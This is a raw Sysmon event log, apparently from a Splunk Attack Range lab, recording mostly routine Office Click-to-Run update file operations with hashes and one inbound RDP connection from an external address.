23542300x800000000000000068588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.VisualStudio.Tools.Applications.Runtime.dllMD5=D668D709A794C234BE55FEBA100DF628,SHA256=CBCD363343ECE390A25BFF91DE6FEE6807A166D6673A3C11451E479CB5A294E8,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.Excel.dllMD5=12C66460D94E0A0E2B2B0B2077EBDF6C,SHA256=0398680AD5983638E6F815C91DB1B8058E2BDE99631D99984C51AC09F4F8F144,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.dllMD5=4F5E58AC14608F41D1A56868DA754DE5,SHA256=80C8843B66CDF4911A983512AAF0FB28F410D210D41374618D8A77142B20F4C3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.Common.v4.0.Utilities.dllMD5=E0668EE3A5BB75FF94179559CEF81BE1,SHA256=8721CE35FCF3AF59B2E8599797CF2182ED6BA2CDE5757C82B05B144008D2B59E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.Office.Tools.Common.dllMD5=5E99F4057EAD3ACB48EACACDE7836E8A,SHA256=F57EDEBBA5F25126D82D33D479FAF528287B53FF12919563368274BE17460CA2,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\Microsoft.DataStreamer.Excel.dllMD5=121A3D013D38AF901349997B756FBC22,SHA256=FAEF61260ED923822F2BD2752DC6C738D5653F043F60B8D7703008E70C37AB22,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.configMD5=67816A156BFB3C011911B1CAE743A8D1,SHA256=0FA163A247412EB78C0068BCB3F964CBF085FE8A1BD3783D63879B2272795718,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dllMD5=C466FA57121904DF38CD6E6C54E500CB,SHA256=350D5E552F3DF8F071849BF7353381E96C148C1E8EB6698A6C210672BA12B8FC,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ\UTILITY.ACCDAMD5=E5D3197FEEA8A28AA5CC0F32C25A6A60,SHA256=DAA8D5EA269FEBC23D2BA34AACB4B4A970C13693802B5710849E0E37C3987AE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ\ACWZUSR12.ACCDUMD5=3B5EEB86EBAB85A6FB1903563F9CA0A3,SHA256=33402CE4A254A64CB6DB1DC0D0BC690970F14B7EC45DA2708A63AC5D47071B65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ\ACWZTOOL.ACCDEMD5=8854539DA82FAC292DB135F3332B5E94,SHA256=BE99D146EFDDEE3A851B815432280CF95C3D1A5813631C514F6D9E27B0FC81E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ\ACWZMAIN.ACCDEMD5=3C411DAE571EB53AD0EEA8DD89DE0005,SHA256=1E9317FDBAF7DC614ED0DFEFB5BF7EA62AB856BCBBCC65147E0EE164E8F7EB04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ\ACWZLIB.ACCDEMD5=AA56F344E71B9EE31F14E6D51788E2D3,SHA256=DB423C828A9ABDAF9D3491F1EE6F5E6548E0FCEA712988AC9CF7F33F1B2531D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACCWIZ\ACWZDAT12.ACCDUMD5=BEDB65DF66250A92069604B7BF6004AF,SHA256=E47B6CCCF100B5EDD2CCA96E8F046A2AE26EA772C5194F94181CAF423D94C222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AccessWeb\SERVWRAP.ASPMD5=FDA52446B3D2C84EADF1A223CA1F22CC,SHA256=E779EFC2D1753210D5371F0595C19FA10E6DE9D39CE9D14BFA0631E67BEEC4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AccessWeb\RPT2HTM4.XSLMD5=2B7FC1FC195730C1786CDA85DB2B3E9D,SHA256=BAF530D2415B74F67513A7497B70CF258AFFE02B8C290E902D7CDDF9C4ABD00E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\AccessWeb\CLNTWRAP.HTMMD5=3FE9D091A2BAB8C3D5E0AFBF9A9F4137,SHA256=7CACDE7FECB7AD78A3643B937B4DED0E509107DB5B8E2CE181CC3B80373407EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\3082\MSO.ACLMD5=15DB663381F67EA3FE2974D70E88BC25,SHA256=3845ABED9923E2D4E571D2F8702083B4B26957BF51D5C958E6E4BA0FBCF89547,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1036\MSO.ACLMD5=E30707FBB38F089FC8A7C5DFAD1B00AE,SHA256=4429EEDDA422DFFAED4C2009E17D627AF57331C0EE9DD4787A69E8BE10FD0CD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLSLICER.DLLMD5=9DF46AA958C085C9E026E02B4EE2B02F,SHA256=2C995000F16340BF418EFF89390A3C5BE107EBD37A595F1D06E53D040F40CF9E,IMPHASH=416284AA293CEC109F9A28147CD54BB7truetrue 23542300x800000000000000068568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLMACRO.CHMMD5=3C7D72745C1714DEC0AF54B00FD422F0,SHA256=8DEE9F556EBA3EE3707D687F45A4246CB4F4A437F7AF8A319F9A85B331678945,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLLEX.DLLMD5=D4B03E5986F076B9185C47AFB748F806,SHA256=C4433B81A0E8F0B9348CBB2E3FB344BE31A2DFBC4A5920D170CD70476A5F3B0C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLINTL32.DLLMD5=BC4C3822888EC43B0240D63C8AFA3959,SHA256=EA779D266BDDA117108412FF0ED353E2F5F1C27EC51C76ED732D4F73C84D667D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\wxpr.dllMD5=8020286538395F59A89DBCCA9411EC5E,SHA256=DEE632BD0D4AD25348EA93FCF6703FBA256804658D0992A14AD0B481F8989EEA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\WWINTL.DLLMD5=10E4DE32E0CEABCB821149FC32ECF1BE,SHA256=0659E01F3F2BCA17B439935058639BCF8B89692468BE351B0AD201E2D3A9F10F,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049738Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:17.909{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4B63F4CEBD8814F2D8A08C5C98D67BD,SHA256=363F0C32E99081488BFB02552632ED2F3D16CC390D66F6C10529D9BE9C82CA19,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049737Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:16.269{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52893-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049736Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:17.706{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=634EDE8C81267F84B808C16997313BDB,SHA256=C692AAB83AAC4D976F0FE579AA824734EDF190F6A2A4EB582FE4A4B12D59293E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.955{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Storage.XmlSerializers.dllMD5=A6D001EFDB63D88AD02B0F48E6D5C8F0,SHA256=704A5E1FC9DEDBADBD2B34D10530CD13BA0F773FD60CB1CACDE858216A98E112,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Shims.dllMD5=66CE16D9C426D5F3AD64FD050C5114D3,SHA256=EA6DC6B69F9E935E20FDB015728A3AED501A1E1F393990F7198A32DF7A2E4142,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.ScriptDom.dllMD5=6DE999AA99B450FCF07DADCE0B9E2485,SHA256=4B3B6419BC93193213F97D7CFE164FC50F0D2918C3AFBE1600625F4A02B6AE92,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.SapBwProvider.dllMD5=519DAADAF6F10AD8313B4328C1A9D6AD,SHA256=E6489A3EC70B596368F46441BAA3930403C911A2E6E630C4D93091CCF4B576E3,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.ProviderShared.dllMD5=F0CBB960FF428F2C5A9457728D4C2E0B,SHA256=E1F06392CC00566512D6152FE462582479CDDD4D973EBEAD524B2A227B0E0D72,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbProvider.dllMD5=62CE7639A5E6F4A0D6C323EA305E5B95,SHA256=C714116BA92A17DB7D83FDB061D8B7DEEB018B4EA0AC8B913FFFDB8F248E64BF,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.908{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbInterop.dllMD5=8DB8C51F9A091D212A25AA1B5AFB7DED,SHA256=9FDB966F3E242048438759D35B41F9B006220C07F91665329FF19931AE046F4D,IMPHASH=1B9C8C78191AFF12D01BF4EF400390B1truetrue 23542300x800000000000000068629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OAuth.dllMD5=EB49F1BD1C82C8B9D5EB581E80833E8C,SHA256=BAAEBAD4CFEFBA19879DBF80977B18CD859585D1673471E9F1CDC071F7ECC211,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.EventSource.dllMD5=A1634C53531EF794C0A068FDF4285DB0,SHA256=1099F8EA4A0CF28E9C2ADA82AE123F5E975BFA585761C9B03AF553C37329F2FD,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.DocumentServices.dllMD5=C0DFB53518AD9B207D450FC7FE3168E9,SHA256=95F1B045335030AD4DC43B238CCD1658D034B797A0D5537CABD23076CE82B448,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.892{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Document.XmlSerializers.dllMD5=FFDC75176BA51D914281942A82EB08D4,SHA256=AE7387591A38242F58FD9E99B0DBAE9C20D4889F88401C10A4BAF13D96FDD118,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Document.dllMD5=A74E6A57D8CFBCC09553E045A2BECC9F,SHA256=74BC4A7459DAD8562AB734340D3DA154701FDB472F242CE7F6D69D3CEFBCA81E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe.configMD5=D1A07403B1FECD2FBA724CBBF80D5C95,SHA256=B081DE573BB6B567AEDDB28B29A6D3952EED70D382AB81995DBF6B646BF71270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exeMD5=DC9DD80C646EA00D7A9401F8A8878E45,SHA256=F29C350ABD5A38587C5C57B1EB418B81BA6A85E84DAED7EC2565EEA6A5F1C34D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:18.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe.configMD5=D1A07403B1FECD2FBA724CBBF80D5C95,SHA256=B081DE573BB6B567AEDDB28B29A6D3952EED70D382AB81995DBF6B646BF71270,IMPHASH=00000000000000000000000000000000falsetrue 